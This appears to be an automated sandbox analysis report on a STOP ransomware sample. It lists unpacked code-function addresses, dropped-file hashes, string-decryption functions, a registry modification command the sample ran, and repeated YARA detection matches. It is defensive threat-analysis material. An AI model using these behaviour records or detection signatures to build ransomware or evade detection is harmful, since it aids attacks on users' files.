Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A089D0	8_2_04A089D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0A916	8_2_04A0A916
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A07A80	8_2_04A07A80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0CA10	8_2_04A0CA10
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A0DBE0	8_2_04A0DBE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A10B00	8_2_04A10B00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A02B60	8_2_04A02B60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040D240	9_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00419F90	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040C070	9_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042E003	9_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00408030	9_2_00408030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410160	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004021C0	9_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044237E	9_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004084C0	9_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004344FF	9_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0043E5A3	9_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040A660	9_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0041E690	9_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406740	9_2_00406740
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00402750	9_2_00402750
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040A710	9_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00408780	9_2_00408780
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042C804	9_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406880	9_2_00406880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004349F3	9_2_004349F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004069F3	9_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00402B80	9_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406B80	9_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044ACFF	9_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042CE51	9_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00434E0B	9_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00406EE0	9_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00420F30	9_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00405057	9_2_00405057
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0042F010	9_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004070E0	9_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004391F6	9_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00435240	9_2_00435240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004C9343	9_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00405447	9_2_00405447
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00405457	9_2_00405457
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00449506	9_2_00449506
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044B5B1	9_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00435675	9_2_00435675
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409686	9_2_00409686
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040F730	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044D7A1	9_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00481920	9_2_00481920
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0044D9DC	9_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00449A71	9_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00443B40	9_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409CF9	9_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040DD40	9_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00427D6C	9_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040BDC0	9_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409DFA	9_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00409F76	9_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0046BFE0	9_2_0046BFE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00449FE3	9_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A43520	13_2_04A43520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47520	13_2_04A47520
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A8B69F	13_2_04A8B69F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A699	13_2_04A4A699
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4E6E0	13_2_04A4E6E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A79A	13_2_04A4A79A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6D7F1	13_2_04A6D7F1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4C760	13_2_04A4C760
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4B0B0	13_2_04A4B0B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A470E0	13_2_04A470E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A430F0	13_2_04A430F0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A500D0	13_2_04A500D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A026	13_2_04A4A026
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A5F030	13_2_04A5F030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4B000	13_2_04A4B000
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6D1A4	13_2_04A6D1A4
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A49120	13_2_04A49120
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A8E141	13_2_04A8E141
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04AC22C0	13_2_04AC22C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47220	13_2_04A47220
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47393	13_2_04A47393
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A8E37C	13_2_04A8E37C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A45DE7	13_2_04A45DE7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A45DF7	13_2_04A45DF7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A82D1E	13_2_04A82D1E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A74E9F	13_2_04A74E9F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A48E60	13_2_04A48E60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47880	13_2_04A47880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A618D0	13_2_04A618D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6E9A3	13_2_04A6E9A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A6F9B0	13_2_04A6F9B0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A459F7	13_2_04A459F7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A489D0	13_2_04A489D0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4A916	13_2_04A4A916
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A47A80	13_2_04A47A80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4CA10	13_2_04A4CA10
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A4DBE0	13_2_04A4DBE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A50B00	13_2_04A50B00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A42B60	13_2_04A42B60
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00419F90	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040C070	14_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042E003	14_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00408030	14_2_00408030
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410160	14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004021C0	14_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044237E	14_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004084C0	14_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004344FF	14_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0043E5A3	14_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040A660	14_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0041E690	14_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406740	14_2_00406740
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00402750	14_2_00402750
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040A710	14_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00408780	14_2_00408780
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042C804	14_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406880	14_2_00406880
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004349F3	14_2_004349F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004069F3	14_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00402B80	14_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406B80	14_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044ACFF	14_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042CE51	14_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00434E0B	14_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00406EE0	14_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00420F30	14_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00405057	14_2_00405057
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0042F010	14_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004070E0	14_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004391F6	14_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040D240	14_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00435240	14_2_00435240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004C9343	14_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00405447	14_2_00405447
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00405457	14_2_00405457
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00449506	14_2_00449506
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044B5B1	14_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00435675	14_2_00435675
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409686	14_2_00409686
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040F730	14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044D7A1	14_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00481920	14_2_00481920
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0044D9DC	14_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00449A71	14_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00443B40	14_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409CF9	14_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040DD40	14_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00427D6C	14_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040BDC0	14_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409DFA	14_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00409F76	14_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0046BFE0	14_2_0046BFE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00449FE3	14_2_00449FE3

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe B1E829E912594D5AF36D66E7F55362A9A07BE9F44D9683F59390B0B731C9DFD3
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\33A3.exe B1E829E912594D5AF36D66E7F55362A9A07BE9F44D9683F59390B0B731C9DFD3

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00428C81 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A68EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A30160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A28EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 004547A0 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 0042F7C0 appears 194 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 0044F23E appears 106 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00428520 appears 154 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 04A70160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00425007 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00454E50 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: String function: 0044F26C appears 40 times

One or more processes crash

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1028 -s 10828

Sample file is different than original file name gathered from version info

Source: XVM5nluelx.exe, 00000000.00000000.1990814559.0000000002C8B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesFilezera2 vs XVM5nluelx.exe
Source: XVM5nluelx.exe	Binary or memory string: OriginalFilenamesFilezera2 vs XVM5nluelx.exe

Uses 32bit PE files

Source: XVM5nluelx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

Yara signature match

Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
